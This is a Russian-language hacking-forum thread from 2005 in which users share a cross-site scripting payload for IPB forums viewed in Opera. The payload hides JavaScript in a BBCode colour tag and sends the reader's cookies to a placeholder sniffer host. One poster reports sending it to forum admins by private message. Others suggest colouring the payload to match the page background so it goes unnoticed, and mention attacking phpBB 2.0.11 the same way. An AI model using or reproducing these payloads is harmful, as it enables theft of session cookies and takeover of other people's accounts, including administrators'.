ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
Перезагрузить страницу XSS в форуме IPB, на примере браузера Опера
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

XSS в форуме IPB, на примере браузера Опера
  #1  
Старый 13.01.2005, 11:16
Аватар для Fr13nd
Fr13nd
Познающий
Регистрация: 03.11.2004
Сообщений: 48
Провел на форуме:
188486

Репутация: 2
По умолчанию XSS в форуме IPB, на примере браузера Опера
Код:
[COLOR=]` style=background:url(javascript:document.images[68].src="http://sniffSite/sniff.cgi?"+document.cookie) [/COLOR]
послал админам в личку, потом был забанен....
потом доперло , что у админов опера,
так он и есть

отображение хсс в опере

Код:
'>` style=background:url(javascript:document.images[1].src="sniff?"+document.cookie)
как сделать чтоб хотябы код не было видно ?
 
Ответить с цитированием

  #2  
Старый 13.01.2005, 12:19
Аватар для >>ElvI$<<
>>ElvI$<<
Познающий
Регистрация: 12.01.2005
Сообщений: 42
Провел на форуме:
36241

Репутация: 1
Отправить сообщение для >>ElvI$<< с помощью ICQ
По умолчанию
Внимательней читай коменты...
Цитата:
Егорыч++++

Совет. Поскольку, уязвимость не работает в других браузерах, то в Опере или Firefox видится всякая абракадабра. Этим можно выдать себя. Для того , чтоб себя не выдать можно покрасить сообщение под цвет фона.

[COLOR=]` style=background:url(javascript:document.ima
ges[68].src="http://sniffSite/sniff.cgi?"+document.cookie) [/COLOR]

Примерно так...
 
Ответить с цитированием

  #3  
Старый 13.01.2005, 12:20
Аватар для >>ElvI$<<
>>ElvI$<<
Познающий
Регистрация: 12.01.2005
Сообщений: 42
Провел на форуме:
36241

Репутация: 1
Отправить сообщение для >>ElvI$<< с помощью ICQ
По умолчанию
ой 8) не корректно отобразилось...


[COLOR=цвет фона][COLOR=]` style=background:url(javascript:document.ima
ges[68].src="http://sniffSite/sniff.cgi?"+document.cookie) [/COLOR][/COLOR]

Вот и все...я уже давно допер,как их скрыть!
 
Ответить с цитированием

  #4  
Старый 13.01.2005, 14:39
Аватар для Algol
Algol
Регистрация: 29.05.2002
Сообщений: 1,793
Провел на форуме:
2050916

Репутация: 0


По умолчанию
Кстати, если хорошо подумать, то эту уязвимость можно адаптировать и под оперу...Без использования обратной кавычки
 
Ответить с цитированием

  #5  
Старый 13.01.2005, 19:15
Аватар для >>ElvI$<<
>>ElvI$<<
Познающий
Регистрация: 12.01.2005
Сообщений: 42
Провел на форуме:
36241

Репутация: 1
Отправить сообщение для >>ElvI$<< с помощью ICQ
По умолчанию
да 8) А еще если хорошо подумать мона и Phpbb 2.0.11 через Xss ломануть 8)
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
В популярном форуме найдены уязвимости dance Мировые новости 4 01.11.2005 13:17
Опера 8.02 - раздают бесплатный код Asprin Мировые новости 1 31.08.2005 10:40



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ